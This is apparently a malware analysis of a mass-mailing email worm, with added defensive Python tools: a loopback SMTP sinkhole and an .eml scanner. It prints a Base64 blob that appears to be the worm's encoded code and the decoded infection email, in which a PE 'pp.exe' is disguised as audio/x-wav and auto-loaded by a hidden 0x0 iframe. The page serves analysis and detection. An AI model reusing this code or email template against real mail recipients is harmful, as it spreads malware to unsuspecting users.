QAD/AP8A/wD9KDAACjgwAAIwMAAWRjAABkYwAAZLRVJORUwzMi5kbGwABFNsZWVwAP8AtRAAAgwAAwMwAP8A/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0fjEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5DAAAAPzzZqvo9vD//4sUtAPhigJC/KoKwHX36AkAAAC3osvNz/vPogDoBAAAAMbz03dYagD/EAvAdFeL2OgEAAAAmMLRd1hqBVP/EAvAdEKL2OgEAAAAruLRd1+B7AAQAABUaAAQAABqDVP/F4HEABAAAAvAdRtUaAAQAABqDFP/F0aD5gd1CoHEAAEAAMnCBADoBAAAAEIkgHxYaPQBAAD/EOlR////6cgAAACLXQiB7AABAACL/OgIAAAAUnVub25jZQBeaAABAADoBAAAAOb1bnlY
VFdqAGoAVlP/EFjoBAAAALj/bnlYagBqAGoEagBT/xDoBAAAAEHobnlYaAABAABXagFqAFZT/xDr0enIAAAA6AQAAACtaeh3WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAALTmd1hq/1P/EOgAAAAAWYPBGpCQkOgEAAAAKnXod1hqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8AYixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQiLfQyLTRDM+2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMMAAAAAAAAAAAAAAAAAAAA=
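The dump above shows only the client side of the SMTP session. The following is an added example, not code from the original post: a loopback SMTP sinkhole that records what a client sends, plus a client that replays the worm's dialogue in the order the decoded code uses it (the HELO..DATA block in one send(), then the message, then the "." line and QUIT, never reading the server's replies). The recipient, the generated sender name and the "TVo=" stand-in for the Base64 PE payload are constructed placeholders.

```python
import socket
import threading

# Constructed placeholders; the worm fills the real values in with wsprintfA.
SAMPLE_RCPT = "victim@example.invalid"
SAMPLE_SENDER = "A-738DF22C9CA04"

# Header skeleton of the message shown above. The Base64 PE payload is replaced
# by "TVo=" (just the bytes "MZ") so the example stays short.
MESSAGE_TEMPLATE = (
    "FROM: {sender}@yahoo.com\r\n"
    "TO: {rcpt}\r\n"
    "SUBJECT: {sender} is comming!\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-type: multipart/mixed; boundary="#BOUNDARY#"\r\n'
    "\r\n--#BOUNDARY#\r\n"
    "Content-Type: text/html\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n\r\n"
    "<html><HEAD></HEAD><body bgColor=3D#ffffff>"
    "<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>\r\n"
    "\r\n--#BOUNDARY#\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: audio/x-wav; name="pp.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "Content-id: THE-CID\r\n\r\n"
    "TVo=\r\n"
)


def replay_worm_dialogue(host, port, rcpt=SAMPLE_RCPT, sender=SAMPLE_SENDER):
    """Client side, sequenced the way the decoded code does it: the
    HELO..DATA block in one send(), then the message, then the "." line and
    QUIT, without reading any server reply (the worm just sleeps between sends)."""
    envelope = (
        "HELO btamail.net.cn\r\n"
        "MAIL FROM: imissyou@btamail.net.cn\r\n"
        f"RCPT TO: {rcpt}\r\n"
        "DATA\r\n"
    )
    with socket.create_connection((host, port)) as s:
        s.sendall(envelope.encode())
        s.sendall(MESSAGE_TEMPLATE.format(sender=sender, rcpt=rcpt).encode())
        s.sendall(b"\r\n.\r\n")
        s.sendall(b"QUIT\r\n")


def _reply(conn, msg):
    """The client never reads replies and may already be gone; that is not an error."""
    try:
        conn.sendall(msg)
    except OSError:
        pass


def _serve_one(srv, result):
    """Server side: accept one client, answer every command with a success
    code (pipelined input is fine) and record the envelope and the DATA body."""
    commands, data_lines, in_data, buf, quit_seen = [], [], False, b"", False
    conn, _ = srv.accept()
    with conn:
        _reply(conn, b"220 sinkhole ESMTP\r\n")
        while not quit_seen:
            chunk = conn.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\r\n" in buf and not quit_seen:
                line, buf = buf.split(b"\r\n", 1)
                text = line.decode("latin-1")
                if in_data:
                    if text == ".":
                        in_data = False
                        _reply(conn, b"250 queued\r\n")
                    else:
                        data_lines.append(text)
                    continue
                commands.append(text)
                verb = text.split(":")[0].split(" ")[0].upper()
                if verb == "DATA":
                    in_data = True
                    _reply(conn, b"354 end data with <CRLF>.<CRLF>\r\n")
                elif verb == "QUIT":
                    quit_seen = True
                    _reply(conn, b"221 bye\r\n")
                else:
                    _reply(conn, b"250 ok\r\n")
    result["commands"] = commands
    result["message"] = "\r\n".join(data_lines)


def run_capture(client_fn):
    """Run client_fn(host, port) against a one-shot sinkhole on loopback and
    return what it sent as (commands, message)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # ephemeral port, loopback only
    srv.listen(1)
    result = {}
    t = threading.Thread(target=_serve_one, args=(srv, result), daemon=True)
    t.start()
    try:
        client_fn("127.0.0.1", srv.getsockname()[1])
        t.join(timeout=10)
    finally:
        srv.close()
    return result.get("commands", []), result.get("message", "")


if __name__ == "__main__":
    cmds, body = run_capture(replay_worm_dialogue)
    print("\n".join(cmds))
    print(body)
```

Because the worm does not wait for replies, a sinkhole that insists on lock-step command/response exchange would desynchronise; the server here simply consumes whatever arrives and answers each line, which is also the right shape for redirecting a sandboxed sample's port 25 traffic to capture the recipients it harvested.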

The decoded data:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: A-738DF22C9CA04@yahoo.com
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"

--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>

--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID

MZP   
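The decoded attachment begins with an MZ header, i.e. it is a PE file delivered under an audio/x-wav content type and referenced from a 0x0 iframe by Content-ID. As an added example (not code from the original post), the scanner below checks an .eml for exactly that pairing: it parses the MIME structure, finds Content-IDs referenced by invisible iframes, and for every attachment compares the declared type against what the decoded bytes actually are. The embedded message is a constructed stand-in with the same headers as the dropped readme.eml; its payload is a 68-byte fake PE header, not the real worm.

```python
import base64
import email
import hashlib
import re
import struct

# Constructed fake PE: DOS header whose e_lfanew (offset 0x3C) points at a bare
# "PE\0\0" signature at offset 0x40. Enough for the header check, runs nothing.
FAKE_PE = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"

# Constructed stand-in for readme.eml: same layout as the message above.
CONSTRUCTED_EML = (
    "FROM: A-738DF22C9CA04@yahoo.com\r\n"
    "TO: victim@example.invalid\r\n"
    "SUBJECT: A-738DF22C9CA04 is comming!\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-type: multipart/mixed; boundary="#BOUNDARY#"\r\n'
    "\r\n"
    "--#BOUNDARY#\r\n"
    "Content-Type: text/html\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "\r\n"
    "<html><HEAD></HEAD><body bgColor=3D#ffffff>"
    "<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>\r\n"
    "\r\n"
    "--#BOUNDARY#\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: audio/x-wav; name="pp.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "Content-id: THE-CID\r\n"
    "\r\n"
    + base64.b64encode(FAKE_PE).decode() + "\r\n"
)

IFRAME_RE = re.compile(r"<iframe[^>]*\bsrc=[\"']?cid:([^\s\"'>]+)[^>]*>", re.I)
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat")


def is_pe(data):
    """True if data has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def hidden_iframe_cids(html):
    """Content-IDs referenced by iframes sized 0x0 (loaded but invisible)."""
    cids = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0).lower()
        if re.search(r"\bheight=[\"']?0\b", tag) and re.search(r"\bwidth=[\"']?0\b", tag):
            cids.append(m.group(1))
    return cids


def scan_eml(raw):
    """Parse the message and return the indicators an analyst checks for:
    hidden-iframe cids, each attachment's declared type versus real content,
    and which PE attachments are the ones the hidden iframe pulls in."""
    msg = email.message_from_string(raw)
    cids, attachments = [], []
    for part in msg.walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True) or b""   # undoes QP / base64
        ctype = part.get_content_type()
        if ctype == "text/html":
            cids.extend(hidden_iframe_cids(body.decode("latin-1")))
            continue
        name = part.get_filename() or ""
        pe = is_pe(body)
        attachments.append({
            "declared_type": ctype,
            "name": name,
            "cid": (part.get("Content-ID") or "").strip("<>"),
            "size": len(body),
            "md5": hashlib.md5(body).hexdigest(),
            "is_pe": pe,
            # a PE declared as anything but an application/* type is a lie
            "type_mismatch": pe and not ctype.startswith("application/"),
            "exec_name": name.lower().endswith(EXEC_EXT),
        })
    auto_loaded = [a for a in attachments if a["is_pe"] and a["cid"] in cids]
    return {"hidden_iframe_cids": cids, "attachments": attachments,
            "auto_loaded_pe": auto_loaded}


if __name__ == "__main__":
    for key, value in scan_eml(CONSTRUCTED_EML).items():
        print(key, value)
```

The content-type check matters more than the file name: a gateway that only looks at `name="pp.exe"` is beaten by renaming, while a gateway that decodes the part and looks for the MZ/PE headers is not. Note that the real attachment on this page starts with "MZP" (a Borland-style DOS stub); `is_pe` only requires the first two bytes to be "MZ" and a valid e_lfanew, so it matches it too.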